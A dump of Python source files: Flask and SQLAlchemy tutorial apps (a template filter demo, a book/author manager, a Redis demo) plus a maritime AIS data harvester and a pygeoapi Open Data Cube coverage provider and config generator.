"id": 2,
"value": "工作使人快乐"
},
{
"id": 3,
"value": "沉迷于工作无法自拔"
},
{
"id": 4,
"value": "日渐消瘦"
},
{
"id": 5,
"value": "以梦为马,越骑越傻"
}
]
return render_template('tem_test.html',
my_str = test_str,
my_list = test_list,
my_id = test_id,
my_dict = test_dict,
my_list_color = my_list_color)
@app.template_filter('reverseself')
def self_filter(list_test):
print(list_test)
temp = list(list_test)
temp.reverse()
print(temp)
return temp
# app.add_template_filter(self_filter,'reverse_self')
@app.template_filter('color')
def do_color(value):
if value == 1:
print(value)
return "orange"
elif value == 2:
print(value)
return "green"
elif value == 3:
print(value)
return "red"
else:
print(value)
return "yellow"
class Config(object):
DEBUG = True
app.config.from_object(Config)
if __name__ == "__main__":
app.run()
```
#### File: Flask_test/book_test/book_demo.py
```python
from flask import Flask
from flask import flash
from flask import redirect
from flask import render_template
from flask import request
from flask import url_for
from flask_sqlalchemy import SQLAlchemy
from flask_wtf import FlaskForm
from wtforms import StringField, SubmitField
from wtforms.validators import InputRequired
app = Flask(__name__)
app.secret_key = 'qwerwertre'
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:[email protected]:3306/python_test'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class AddBookForm(FlaskForm):
author = StringField('作者:',validators=[InputRequired('请输入作者')])
book = StringField('书名:',validators=[InputRequired('请输入书名')])
submit = SubmitField('添加')
class Author(db.Model):
# 一
__tablename__ = 'author'
id = db.Column(db.Integer,primary_key=True)
name = db.Column(db.String(64), unique=True)
books = db.relationship('Book', backref='author')
class Book(db.Model):
# 多
__tablename__ = 'book'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
author_id = db.Column(db.Integer,db.ForeignKey(Author.id))
@app.route('/delete_book/<book_id>')
def delete_book(book_id):
try:
book = Book.query.get(book_id)
except Exception as error:
print(error)
flash('查询错误')
if not book:
print('书籍不存在')
flash('书籍不存在')
else:
try:
db.session.delete(book)
db.session.commit()
except Exception as error:
print('错误')
db.session.rollback()
flash('删除失败')
return redirect(url_for('index'))
@app.route('/delete_author/<author_id>')
def delete_author(author_id):
try:
author = Author.query.get(author_id)
except Exception as error:
flash('查询出错')
if not author:
return '查无此人'
else:
try:
Book.query.filter(Book.author_id==author_id).delete()
db.session.delete(author)
db.session.commit()
except Exception as error:
flash('删除出现异常')
return '删除错误'
return redirect(url_for('index'))
# @app.route('/delete_author/<author_id>')
# def delete_author(author_id):
# """删除作者以及作者所有的书籍"""
#
# try:
# author = Author.query.get(author_id)
# except Exception as e:
# print(e)
# return "查询错误"
#
# if not author:
# return "作者不存在"
#
# # 删除作者及其所有书籍
#
# try:
# # 先删除书籍
# Book.query.filter(Book.author_id == author_id).delete()
# # 再删除指定作者
# db.session.delete(author)
# db.session.commit()
# except Exception as e:
# print(e)
# db.session.rollback()
# return "删除失败"
#
# return redirect(url_for('index'))
# @app.route('/delete_book/<book_id>')
# def delete_book(book_id):
#
# try:
# book = Book.query.get(book_id)
# except Exception as error:
# print(error)
# return '查询错误'
# if not book:
# return "书籍不存在"
#
# try:
# db.session.delete(book)
# db.session.commit()
# except Exception as error:
# print(error)
# db.session.rollback()
# return '删除失败'
# return redirect(url_for('index'))
@app.route('/',methods=['POST','GET'])
def index():
book_form = AddBookForm()
if book_form.validate_on_submit():
author_name = book_form.author.data
book_name = book_form.book.data
author = Author.query.filter(Author.name == author_name).first()
book = Book.query.filter(Book.name == book_name).first()
if author and not book:
try:
book = Book(name=book_name,author_id=author.id)
db.session.add(book)
db.session.commit()
except Exception as error:
db.session.rollback()
print(error)
flash('添加失败')
return
# 作者不存在,书不存在
elif not author and not book:
try:
author = Author(name=author_name)
db.session.add(author)
db.session.commit()
book = Book(name=book_name, author_id=author.id)
db.session.add(book)
db.session.commit()
except Exception as error:
db.session.rollback()
print(error)
flash('添加错误')
else:
print('重复添加')
flash('重复添加')
# 作者存在,书存在
# 作者不存在,书存在
else:
if request.method == 'POST':
flash('参数错误')
# 判断book_form是否可以提交
# 如果可以被提交执行逻辑处理
# if book_form.validate_on_submit():
# author_name = book_form.author.data
# book_name = book_form.book.data
# # 1.提交表单首先查询作者的名字
# author = Author.query.filter(Author.name == author_name).first()
# # 判断作者名字是否存在
# if not author:
# # 如果作者名字不存在
# # 添加作者信息到数据库
# try:
# author = Author(name=author_name)
# db.session.add(author)
# db.session.commit()
# book = Book(name=book_name, author_id=author.id)
# db.session.add(book)
# db.session.commit()
# except Exception as error:
# db.session.rollback()
# print(error)
# flash('添加失败')
# else:
# book = Book.query.filter(Book.name == book_name).first()
# if not book:
# try:
# # 否则添加书籍到数据库(指定作者)
# book = Book(name=book_name,author_id=author.id)
# db.session.add(book)
# db.session.commit()
# except Exception as error:
# print(error)
# flash("添加失败")
# else:
# flash('已经存在')
# # 如果不能被提交则提示错误
# else:
# if request.method == "POST":
# flash('错误')
authors = Author.query.all()
# 使用form表单
# return render_template('base.html',authors=authors)
# print(book_form)
# 使用wtf表单
return render_template('base_form.html',authors=authors, form=book_form)
class Config(object):
DEBUG = True
app.config.from_object(Config)
if __name__ == "__main__":
# db.drop_all()
db.create_all()
# au1 = Author(name='张三')
# au2 = Author(name='王五')
# au3 = Author(name='李四')
# db.session.add_all([au1,au2,au3])
# db.session.commit()
#
# bk1 = Book(name='asdfsd',author_id=au1.id)
# bk2 = Book(name='sdfsdfbxvxc',author_id=au2.id)
# bk3 = Book(name='cxfdgdh',author_id=au3.id)
# db.session.add_all([bk1,bk2,bk3])
# db.session.commit()
app.run()
```
#### File: Flask_test/redis/demo1_redisconect.py
```python
from redis import StrictRedis
def demo():
sr = StrictRedis(host='127.0.0.1')
try:
result = sr.set('name','itheima')
print(result)
except Exception as error:
print(error)
if __name__ == '__main__':
demo()
```
#### File: Flask_test/SQLAlchemy_test/sql_test.py
```python
from flask_sqlalchemy import SQLAlchemy
from flask import Flask
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql://root:[email protected]:3306/test'
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
class Role(db.Model):
# 定义表名
__tablename__ = 'roles'
# 定义列对象
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True)
us = db.relationship('User', backref='role')
# print(us)
# repr()方法显示一个可读字符串
def __repr__(self):
return 'Role:%s' % self.name
class User(db.Model):
__tablename__ = 'users'
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(64), unique=True, index=True)
email = db.Column(db.String(64), unique=True)
password = db.Column(db.String(64))
role_id = db.Column(db.Integer, db.ForeignKey('roles.id'))
def __repr__(self):
return 'User:%s' % self.name
@app.route('/')
def index():
return 'index'
class Config(object):
DEBUG = True
app.config.from_object(Config)
if __name__ == "__main__":
db.drop_all()
db.create_all()
ro1 = Role(name='admin')
db.session.add(ro1)
db.session.commit()
# 再次插入一条数据
ro2 = Role(name='user')
db.session.add(ro2)
db.session.commit()
us1 = User(name='wang', email='<EMAIL>', password='<PASSWORD>', role_id=ro1.id)
us2 = User(name='zhang', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us3 = User(name='chen', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us4 = User(name='zhou', email='<EMAIL>', password='<PASSWORD>', role_id=ro1.id)
us5 = User(name='tang', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us6 = User(name='wu', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us7 = User(name='qian', email='<EMAIL>', password='<PASSWORD>', role_id=ro1.id)
us8 = User(name='liu', email='<EMAIL>', password='<PASSWORD>', role_id=ro1.id)
us9 = User(name='li', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
us10 = User(name='sun', email='<EMAIL>', password='<PASSWORD>', role_id=ro2.id)
db.session.add_all([us1, us2, us3, us4, us5, us6, us7, us8, us9, us10])
db.session.commit()
"""
查询所有用户数据
User.query.all()
查询有多少个用户
User.query.count()
查询第1个用户
User.query.first()
查询id为4的用户[3种方式]
User.query.get(4)
User.query.filter_by(id=4).first()
User.query.filter(User.id==4).first()
查询名字结尾字符为g的所有数据[开始/包含]
User.query.filter(User.name.endswith('g')).all()
查询名字不等于wang的所有数据[2种方式]
User.query.filter(not_(User.name=='wang')).all()
User.query.filter(User.name != 'wang').all()
查询名字和邮箱都以 li 开头的所有数据[2种方式]
User.query.filter(User.name.startswith('li'),User.email.startswith('li')).all()
User.query.filter(and_(User.name.startswith('li'),User.email.startswith('li'))).all()
查询password是 `<PASSWORD>` 或者 `email` 以 `itheima.com` 结尾的所有数据
User.query.filter(or_(User.password =='<PASSWORD>',User.email.endswith('itheima.com'))).all()
查询id为 [1, 3, 5, 7, 9] 的用户列表
查询name为liu的角色数据
User.query.filter(User.name == 'liu').first().role
查询所有用户数据,并以邮箱排序
User.query.order_by(User.email.desc()).all()
每页3个,查询第2页的数据
"""
app.run()
``` |
{
"source": "52North/MariDataHarvest",
"score": 3
} |
#### File: MariDataHarvest/Harvester/main.py
```python
import argparse
import logging
import os
import shutil
import time
import traceback
from pathlib import Path
from ais import download_year_AIS, subsample_year_AIS_to_CSV, download_file, get_files_list, subsample_file
from utilities.helper_functions import Failed_Files, SaveToFailedList, init_Failed_list, FileFailedException, check_dir
from EnvironmentalData.weather import append_to_csv
logger = logging.getLogger(__name__)
def years_arg_parser(input: str) -> list[int]:
years = input.split('-')
choices = list(range(2009, 2022))
if len(years) == 2:
start = years[0]
end = years[1]
try:
if int(start) in choices and int(end) in choices:
if start < end:
return list(range(int(start), int(end) + 1))
elif start == end:
return [start]
raise ValueError
except Exception:
raise argparse.ArgumentTypeError(
"'" + input + "' is not Valid. Expected input 'YYYY' , 'YYYY-YYYY' or 'YYYY,YYYY,YYYY'.")
years = input.split(',')
if len(years) > 1:
try:
parsed_years = [int(y) for y in years if int(y) in choices]
if len(parsed_years) < len(years):
raise ValueError
return parsed_years
except ValueError as e:
raise argparse.ArgumentTypeError(
"'" + input + "' is not Valid. Expected input 'YYYY' , 'YYYY-YYYY' or 'YYYY,YYYY,YYYY'.")
if len(years) == 1:
try:
parsed_y = int(input)
if not parsed_y in choices:
raise ValueError
return [parsed_y]
except ValueError as e:
raise argparse.ArgumentTypeError(
"'" + input + "' is not Valid. Expected input 'YYYY' , 'YYYY-YYYY' or 'YYYY,YYYY,YYYY'.")
def init_directories(dir, year, minutes):
download_dir = Path(dir, str(year))
merged_dir = Path(dir, str(year) + '_merged_%s' % minutes)
filtered_dir = Path(dir, '{0}_filtered_{1}'.format(str(year), minutes))
download_dir.mkdir(parents=True, exist_ok=True)
merged_dir.mkdir(parents=True, exist_ok=True)
filtered_dir.mkdir(parents=True, exist_ok=True)
return download_dir, filtered_dir, merged_dir
if __name__ == '__main__':
# arguments parameters
parser = argparse.ArgumentParser(
description='For a given a year and minutes interval of subsampling to start harvesting AIS-Data.',
epilog='The following exit codes are configured:\n16 -> service secrets configuration file not found.')
parser.add_argument('-y', '--year',
help="A given year to start a task. Expected input 'YYYY' , 'YYYY-YYYY' or 'YYYY,YYYY,YYYY'",
required=True, type=years_arg_parser)
parser.add_argument('-m', '--minutes', help='A given minutes interval to downscale the data.',
required=True, type=int, choices=range(1, 1440))
parser.add_argument('-s', '--step', help='Select the specific step to perform.',
required=False, type=int, choices=range(0, 4), default=0)
parser.add_argument('-d', '--dir',
help='The output directory to collect csv files. By default the root directory is used.',
default='', type=str, required=False)
parser.add_argument('-c', '--clear',
help='Clears the raw output directory in order to free memory.',
action='store_true')
parser.add_argument('-f', '--depth-first',
help='Clears the raw output directory in order to free memory.',
action='store_true')
args, unknown = parser.parse_known_args()
arg_string = 'Starting a task for year(s) %s with subsampling of %d minutes' % (
','.join(list(map(str, args.year))).join(['[', ']']), int(args.minutes))
logger.info( arg_string + '. The output files will be saved to %s' % (args.dir if args.dir != '' else 'project directory'))
args.dir = Path().absolute().parent if args.dir == '' else Path(args.dir)
init_Failed_list(arg_string, args.dir)
for year in args.year:
logger.info('Processing year %s' % str(year))
# initialize directories
download_dir, filtered_dir, merged_dir = init_directories(args.dir, year, args.minutes)
merged_dir_list = check_dir(merged_dir)
filtered_dir_list = check_dir(filtered_dir)
download_dir_list = check_dir(download_dir)
if args.depth_first:
logger.info('Task is started using Depth-first mode')
for file in get_files_list(year, exclude_to_resume=merged_dir_list):
file_name = file.split('.')[0] + '.csv'
file_failed = False
interval = 10
while True:
try:
if (args.step == 1 or not file_name in filtered_dir_list) and not file_name in download_dir_list:
logger.info('STEP 1/3 downloading AIS data: %s' % file)
file_name = download_file(file, download_dir, year)
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when downloading AIS data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning('Skipping steps 1, 2 and 3 for file %s after attempting %d times' % (
file, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
file_failed = True
break
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
if args.step == 1:
continue
while True:
try:
if file_failed: break
if file_name in filtered_dir_list:
logger.info(
'STEP 2/3 File: %s has been already subsampled from a previous run.' % file_name)
break
logger.info('STEP 2/3 subsampling CSV data: %s' % file_name)
subsample_file(file_name, download_dir, filtered_dir, args.minutes)
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when subsampling CSV data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning(
'Skipping steps 2, 3 for file %s after attempting %d times' % (file, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
file_failed = True
break
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
if args.clear and not file_failed:
logger.info('Remove raw file %s' % file_name)
if Path(download_dir, file_name).exists():
os.remove(str(Path(download_dir, file_name)))
else:
logger.warning("File not found %s " % str(Path(download_dir, file_name)))
while True:
try:
if file_failed: break
logger.info('STEP 3/3 appending weather data: %s' % file_name)
append_to_csv(Path(filtered_dir, file_name), Path(merged_dir, file_name))
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when appending environment data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning(
'Skipping step 3 for file %s after attempting %d times' % (file, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
break
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
else:
if args.step != 0:
logger.info('Single step selected')
if args.step == 0 or args.step == 1:
while True:
try:
logger.info('STEP 1/3 downloading AIS data')
# download AIS data
download_year_AIS(year, download_dir)
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when downloading AIS data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning(
'Skipping step 1 for file %s after attempting %d times' % (e.file_name, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
if args.step == 0 or args.step == 2:
# subset and filter data
interval = 10
while True:
try:
logger.info('STEP 2/3 subsampling CSV data')
subsample_year_AIS_to_CSV(str(year), download_dir, filtered_dir, args.minutes)
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when subsampling CSV data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning('Skipping file step 2 for file %s after attempting %d times' % (
e.file_name, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
if args.clear:
logger.info('Remove raw files and clear directory of year %s ' % str(download_dir))
if download_dir.exists():
shutil.rmtree(download_dir)
if args.step == 0 or args.step == 3:
# append weather data for each row in the filtered data
interval = 10
while True:
try:
logger.info('STEP 3/3 appending weather data')
for file in filtered_dir_list:
if Path(merged_dir, file).exists() or file in Failed_Files: continue
append_to_csv(Path(filtered_dir, file), Path(merged_dir, file))
break
except FileFailedException as e:
logger.error(traceback.format_exc())
logger.error('Error when appending environment data')
if interval > 40:
Failed_Files.append(e.file_name)
logger.warning(
'Skipping step 3 for file %s after attempting %d times' % (e.file_name, interval // 10))
SaveToFailedList(e.file_name, e.exceptionType, args.dir)
interval = 10
logger.error('Re-run in {0} sec'.format(interval))
time.sleep(interval)
interval += 10
``` |
{
"source": "52North/pygeoapi-odc-provider",
"score": 2
} |
#### File: pygeoapi-odc-provider/src/create_config.py
```python
import logging
import os
from pathlib import Path
import yaml
import argparse
from odcprovider.connector import OdcConnector
from odcprovider.utils import convert_datacube_bbox_to_wgs84
from datacube.utils.geometry import BoundingBox
from datacube.model import DatasetType
logging_config_file = Path(Path(__file__).parent, 'logging.yaml')
level = logging.DEBUG
if os.path.exists(logging_config_file):
with open(logging_config_file, 'rt') as file:
try:
config = yaml.safe_load(file.read())
logging.config.dictConfig(config)
except Exception as e:
print(e)
print('Error while loading logging configuration from file "{}". Using defaults'
.format(logging_config_file))
logging.basicConfig(level=level)
else:
print('Logging file configuration does not exist: "{}". Using defaults.'.format(logging_config_file))
logging.basicConfig(level=level)
LOGGER = logging.getLogger(__name__)
# ToDo: improve formatting of created config.yaml
def parse_parameter() -> argparse.Namespace:
parser = argparse.ArgumentParser(
description='Create resource entries for pygeoapi configuration. If infile is '
'provided, resource entries will be inserted there and written to outfile.')
parser.add_argument('--infile', '-i',
help='File name of the config yaml that should be merged.')
parser.add_argument('--outfile', '-o',
default='config_auto.yml',
help='Output yaml file name (default: config_auto.yml)')
parser.add_argument('--exclude-products',
help='Comma separated list of product names to exclude')
args = parser.parse_args()
if args.exclude_products:
args.exclude_products = [s.strip() for s in args.exclude_products.split(",")]
LOGGER.info("""
Start creating pygeoapi config
==============================
- empty values are allowed
infile : {}
outfile : {}
exclude products : {}""".format(args.infile, args.outfile, args.exclude_products))
return args
def _create_resource_from_odc_product(product: DatasetType, bbox: BoundingBox, format_set: set) -> dict:
"""
Create resource from Open Data Cube product
:param product: ODC product, datacube.model.DatasetType
:param bbox: bbox in WGS84!!!
:param format_set: set of format strings (e.g. 'GeoTIFF' or 'netCDF')
:return: dict
"""
left, bottom, right, top = bbox
if product.fields['format'] is not None:
format_name = product.fields['format']
elif len(format_set) == 1:
format_name = next(iter(format_set))
else:
format_name = 'GeoTIFF'
links = []
if 'links' in product.metadata_doc.keys():
for link in product.metadata_doc.get('links'):
links.append({
'type': link.get('type'),
'rel': link.get('rel'),
'title': link.get('title'),
'href': link.get('href'),
'hreflang': link.get('hreflang')
})
resource_dict = {
'type': 'collection',
'title': product.name,
'description': product.definition['description'],
'keywords': product.metadata_doc.get('keywords') if 'keywords' in product.metadata_doc.keys() else [],
'links': links,
'extents': {
'spatial': {
'bbox': [left, bottom, right, top],
'crs': 'http://www.opengis.net/def/crs/OGC/1.3/CRS84'
}
},
'providers': [{
'type': 'coverage',
'name': 'odcprovider.OpenDataCubeCoveragesProvider',
'data': product.name,
'format': {
'name': format_name,
'mimetype': 'application/{}'.format(format_name.lower())
}
}],
}
return resource_dict
def _merge_config(infile, data):
"""
Insert auto-created resource entries into given config file if given
:param infile: file name of a pygeoapi yml config file
:param data: dict of resource entries
:return: merged dict of resource entries
"""
with open(infile, 'r') as infile:
data_in = yaml.load(infile, Loader=yaml.FullLoader)
for resource_entry in data['resources']:
data_in['resources'].update({resource_entry: data['resources'][resource_entry]})
return data_in
def main():
args = parse_parameter()
# Create collection for each datacube product that is not excluded
dc = OdcConnector()
data = {'resources': {}}
products = dc.list_product_names()
LOGGER.info("Start processing {} products in ODC instance".format(len(products)))
idx = 1
for dc_product_name in products:
LOGGER.info("[{}/{}] Processing product '{}'".format(idx, len(products), dc_product_name))
if dc_product_name in args.exclude_products:
LOGGER.info("[{}/{}] Product '{}' is list of products to exclude, hence skipping it"
.format(idx, len(products), dc_product_name))
else:
LOGGER.info("[{}/{}] Including product '{}'".format(idx, len(products), dc_product_name))
dc_product = dc.get_product_by_id(dc_product_name)
format_set = set()
for dataset in dc.get_datasets_for_product(dc_product.name):
format_set.add(dataset.format)
# Make sure bbox is in WGS84
if len(dc.get_crs_set(dc_product.name)) == 1:
bbox = convert_datacube_bbox_to_wgs84(dc.bbox_of_product(dc_product.name),
str(dc.get_crs_set(dc_product.name).pop()))
else:
bbox = dc.bbox_of_product(dc_product.name)
data['resources'][dc_product.name] = _create_resource_from_odc_product(dc_product, bbox, format_set)
idx = idx + 1
LOGGER.info("Finished processing {} products".format(len(products)))
# Write to yaml file, merge with provided config yaml if given
with open(args.outfile, 'w') as outfile:
if args.infile is not None:
data = _merge_config(args.infile, data)
LOGGER.debug("Writing configuration to file '{}':\n{}\n".format(outfile.name, data))
yaml.dump(data, outfile, default_flow_style=False, sort_keys=False)
LOGGER.info("Finished processing ODC products")
if __name__ == "__main__":
main()
```
#### File: src/odcprovider/coverages.py
```python
import logging
import json
# ToDo move to OdcConnector somehow
from datacube.utils.geometry import CRS as CRS_DATACUBE, BoundingBox
from pygeoapi.provider.base import (BaseProvider,
ProviderConnectionError,
ProviderGenericError,
ProviderQueryError,
ProviderInvalidQueryError,
ProviderNoDataError)
from pyproj import CRS, Transformer
from rasterio import Affine
from rasterio.io import MemoryFile
from .connector import OdcConnector
from .utils import meter2degree
import numpy as np
LOGGER = logging.getLogger(__name__)
CAST_MAP = {
'uint8': 'int16',
'uint16': 'int32',
'uint32': 'int64'
}
TYPE_URI_MAP = {
'int8': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/signedByte',
'int16': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/signedShort',
'int32': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/signedInt',
'int64': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/signedLong',
'uint8': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/unsignedByte',
'uint16': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/unsignedShort',
'uint32': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/unsignedInt',
'uint64': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/unsignedLong',
'float16': 'http://defs.opengis.net/vocprez/object?uri=http://www.opengis.net/def/dataType/OGC/0/float16',
'float32': 'http://defs.opengis.net/vocprez/object?uri=http://www.opengis.net/def/dataType/OGC/0/float32',
'float64': 'http://defs.opengis.net/vocprez/object?uri=http://www.opengis.net/def/dataType/OGC/0/float64',
'float128': 'http://defs.opengis.net/vocprez/object?uri=http://www.opengis.net/def/dataType/OGC/0/float128',
'double': 'http://defs.opengis.net/vocprez/object?uri=http%3A//www.opengis.net/def/dataType/OGC/0/double'
}
class OpenDataCubeCoveragesProvider(BaseProvider):
"""OpenDataCube Provider
This provider plugin maps an OGC collection to an ODC product
"""
def __init__(self, provider_def):
"""
Initialize object
:param provider_def: provider definition
:returns: pygeoapi.provider.rasterio_.RasterioProvider
"""
super().__init__(provider_def)
self.dc = OdcConnector()
if self.data not in self.dc.list_product_names():
raise ProviderGenericError("Configured product '{}' is not contained in OpenDataCube instance"
.format(self.data))
LOGGER.info('Start initializing product {}'.format(self.data))
try:
# datacube.utils.geometry.CRS
self.crs_obj = None
self.native_format = provider_def['format']['name']
self._coverage_properties = self._get_coverage_properties(self._get_bbox())
self._measurement_properties = self._get_measurement_properties()
# axes, crs and num_bands is need for coverage providers
# (see https://github.com/geopython/pygeoapi/blob/master/pygeoapi/provider/base.py#L65)
self.axes = self._coverage_properties['axes']
self.crs = self._coverage_properties['crs_uri']
self.num_bands = self._coverage_properties['num_bands']
self.fields = [field['name'] for field in self._measurement_properties]
LOGGER.info('Finished initializing product {}'.format(self.data))
except Exception as err:
LOGGER.warning(err)
raise ProviderConnectionError(err)
def query(self, range_subset=[], subsets={}, bbox=[], datetime_=None,
format_='json', **kwargs):
"""
Extract data from collection
:param range_subset: list of bands
:param subsets: dict of subset names with lists of ranges
:param bbox: bounding box [minx,miny,maxx,maxy]
:param datetime_: temporal (datestamp or extent)
:param format_: data format of output
:returns: coverage data as dict of CoverageJSON or native format
"""
# ---------------- #
# Query parameters (https://ogcapi.ogc.org/coverages/overview.html)
# url: {datasetAPI}/collections/{coverageid}/coverage
# Subset with well-defined ranges for named axes
# ?subset=Lat(40:50),Lon(10: 20)
# ?subset=time("2019-03-27")
# Band subset
# ?rangeSubset=B02,B03,B04
# Bbox (in WGS84 or WGS84h)
# ?bbox=10,40,20,50
# Scaling
# ?scaleSize=Lon(800),Lat(400)
# ?scaleFactor=2
# ?scaleAxes=Lon(2)
# ---------------- #
bands = range_subset
LOGGER.info('Bands: {}, subsets: {}, bbox: {}'.format(bands, subsets, bbox))
# initial bbox, full extent of collection
minx, miny, maxx, maxy = self._coverage_properties['bbox']
if all([not bands, not subsets, not bbox]):
LOGGER.info('No parameters specified')
if all([self._coverage_properties['x_axis_label'] not in subsets,
self._coverage_properties['y_axis_label'] not in subsets,
not bbox]):
msg = 'spatial subsetting via bbox parameter or subset is mandatory'
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
if all([self._coverage_properties['x_axis_label'] in subsets,
self._coverage_properties['y_axis_label'] in subsets,
len(bbox) > 0]):
msg = 'bbox and subsetting by coordinates are exclusive'
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
# -------------- #
# Spatial subset #
# -------------- #
if len(bbox) > 0:
# fixed by specification
crs_src = CRS.from_epsg(4326)
crs_dest = CRS.from_epsg(self.crs_obj.to_epsg())
LOGGER.debug('Source EPSG: {}'.format(crs_src.to_epsg()))
LOGGER.debug('Target EPSG: {}'.format(crs_dest.to_epsg()))
if crs_src == crs_dest:
LOGGER.info('source bbox CRS and data CRS are the same')
minx, miny, maxx, maxy = bbox
else:
LOGGER.info('source bbox CRS and data CRS are different')
LOGGER.info('reprojecting bbox into native coordinates')
minxbox, minybox, maxxbox, maxybox = bbox
t = Transformer.from_crs(crs_src, crs_dest, always_xy=True)
minx, miny = t.transform(minxbox, minybox)
maxx, maxy = t.transform(maxxbox, maxybox)
LOGGER.info('Source coordinates in {}: {}'.format(
crs_src.to_epsg(),
[minxbox, minybox, maxxbox, maxybox]))
LOGGER.info('Destination coordinates in {}: {}'.format(
crs_dest.to_epsg(),
[minx, miny, maxx, maxy]))
elif (self._coverage_properties['x_axis_label'] in subsets and
self._coverage_properties['y_axis_label'] in subsets):
LOGGER.info('Creating spatial subset')
x = self._coverage_properties['x_axis_label']
y = self._coverage_properties['y_axis_label']
minx = subsets[x][0]
maxx = subsets[x][1]
miny = subsets[y][0]
maxy = subsets[y][1]
# ToDo consider resolution in next development iteration
if minx > maxx or miny > maxy:
msg = 'spatial subsetting invalid min > max'
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
if self.data != 'landsat8_c2_l2':
if self.crs_obj.projected:
max_allowed_delta = 7500
else:
max_allowed_delta = 0.125
if maxx - minx > max_allowed_delta:
msg = 'spatial subsetting too large {}. please request max {}'.format(maxx - minx, max_allowed_delta)
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
if maxy - miny > max_allowed_delta:
msg = 'spatial subsetting too large {}. please request max {}'.format(maxy - miny, max_allowed_delta)
LOGGER.warning(msg)
raise ProviderInvalidQueryError(msg)
# ---------------------- #
# Load data via datacube #
# ---------------------- #
# Note:
# - resolution and align expect the following coordinate order: (y, x)
# - datacube.Datacube.load accepts all of the following parameters for spatial subsets independent of the crs:
# 'latitude' or 'lat' or 'y' / 'longitude' or 'lon' or 'long' or 'x'
# - See for details on parameters and load() method:
# https://datacube-core.readthedocs.io/en/latest/dev/api/generate/datacube.Datacube.load.html#datacube-datacube-load
params = {
'crs': 'epsg:{}'.format(self.crs_obj.to_epsg()),
'x': (minx, maxx),
'y': (miny, maxy),
"align": (abs(self._coverage_properties['resy'] / 2),
abs(self._coverage_properties['resx'] / 2)),
'resolution': (self._coverage_properties['resy'], self._coverage_properties['resx']),
'output_crs': 'epsg:{}'.format(self.crs_obj.to_epsg()),
# 'resampling': 'nearest' # nearest is the default value
}
if len(bands) > 0:
params['measurements'] = bands
# ToDo: enable output in different crs? Does API Coverages support this?
# ToDo: check if re-projection is necessary
LOGGER.debug('RAW params for dc.load:\n{}'.format(json.dumps(params, indent=4)))
LOGGER.debug('self.data: "{}"'.format(self.data))
LOGGER.debug('Load data from ODC...')
dataset = self.dc.load(product=self.data, **params)
if len(list(dataset.keys())) == 0:
LOGGER.debug('...request resulted in empty dataset')
raise ProviderNoDataError('An empty dataset was returned. Please check your request.')
else:
LOGGER.debug('...received data')
# Use 'dataset.time.attrs.pop('units', None)' to prevent the following error:
# "ValueError: failed to prevent overwriting existing key units in attrs on variable 'time'.
# This is probably an encoding field used by xarray to describe how a variable is serialized.
# To proceed, remove this key from the variable's attributes manually."
# Check for existence to "prevent AttributeError: 'Dataset' object has no attribute 'time'"
if hasattr(dataset, 'time') and dataset.time is not None and hasattr(dataset.time, 'attrs') and \
dataset.time.attrs is not None:
dataset.time.attrs.pop('units', None)
# ----------------- #
# Return data #
# ----------------- #
if len(bands) == 0:
# if no bands are specified in the request ODC loads all bands by default
bands = list(dataset.keys())
out_meta = {
'bbox': [minx, miny, maxx, maxy],
'width': abs((maxx - minx) / self._coverage_properties['resx']),
'height': abs((maxy - miny) / self._coverage_properties['resy']),
'bands': bands
}
if self.options is not None:
LOGGER.info('Adding dataset options')
for key, value in self.options.items():
out_meta[key] = value
LOGGER.debug('Processed dataset')
if format_ == 'json':
LOGGER.info('Creating output in CoverageJSON')
